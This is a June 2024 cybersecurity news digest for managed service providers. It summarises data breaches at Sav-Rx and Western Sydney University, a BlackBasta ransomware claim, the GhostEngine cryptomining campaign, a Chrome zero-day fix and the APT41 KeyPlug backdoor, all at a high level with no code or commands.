MSP cybersecurity news digest, June 3, 2024

Sav-Rx discloses data breach impacting 2.8 million Americans and BlackBasta ransomware group claims another US victim  

Prescription management company Sav-Rx, with a revenue of approximately $10 million in 2023, warned over 2.8 million people in the United States about a data breach in 2023, stating that their personal data was stolen.

Sav-Rx detected a network interruption and reportedly secured their systems, engaging third-party cybersecurity experts. Their IT systems were restored the next day with no delay in prescription shipments, but the investigation took almost eight months. The breach exposed data including names, dates of birth, Social Security Numbers, and insurance information. Sav-Rx stated that it has no evidence of misuse of the data but urged affected individuals to monitor their credit and enroll in identity theft protection services. You can find additional information about the story here.

In a separate case, the BlackBasta ransomware group claimed to have attacked Atlas, a major U.S. fuel distributor, adding the company to its list of victims on a Tor leak site. They assert they have stolen 730 GB of data, including corporate and employee information, and have published documents such as ID cards and payroll requests as proof. Atlas has not yet disclosed the alleged incident.

Western Sydney University data breach exposed student data

Western Sydney University (WSU) has alerted students and staff about a data breach affecting its Microsoft 365 and SharePoint environment.

The breach, initially discovered in January 2024, revealed unauthorized access dating back to May 17, 2023, impacting emails and SharePoint files. The incident potentially involved the University's Solar Car Laboratory infrastructure and has affected approximately 7,500 individuals, who will receive personalized notifications.

WSU has not received any threats or extortion demands and assures that core operations remain unaffected.

GhostEngine mining attacks kill EDR security using vulnerable drivers

A cryptomining campaign dubbed 'REF4578' has been deploying GhostEngine, a malicious payload that uses vulnerable drivers to disable security products and install an XMRig miner.

The campaign begins with 'Tiworker.exe,' which downloads a PowerShell script from the attacker's C2 server, acting as GhostEngine's primary loader. This script disables Windows Defender, sets up persistence tasks, and launches 'smartscreen.exe' to terminate EDR software and start cryptocurrency mining.

Defenders should watch for suspicious PowerShell activity, unusual processes, and network traffic to cryptomining pools and block file creation from vulnerable drivers.

Google fixes eighth actively exploited Chrome zero-day vulnerability this year

Google has released an emergency security update to fix the eighth zero-day vulnerability in the Chrome browser this year.

Discovered internally by Google, the high-severity 'type confusion' vulnerability in the V8 JavaScript engine is tracked as CVE-2024-5274. This flaw allows crashes, data corruption, and arbitrary code execution, and is actively exploited in the wild. The update is rolling out on Chrome's Stable channel for Windows, Mac and Linux, and users are advised to relaunch their browsers after updating.

This is the third actively exploited zero-day vulnerability fixed in Chrome this month, highlighting the ongoing threats to browser security.

APT41: The threat of KeyPlug against Italian industries

Researchers uncovered a backdoor known as KeyPlug, which targeted various Italian industries for months.

KeyPlug is designed to target both Windows and Linux systems, using different protocols for communication depending on the malware sample's configuration. The Windows version uses a .NET loader to decrypt and execute the payload, while the Linux version employs VMProtect to decode the payload during execution.

This backdoor is attributed to APT41, a threat group that researchers have identified as a Chinese state-sponsored espionage group also conducting financially-motivated operations.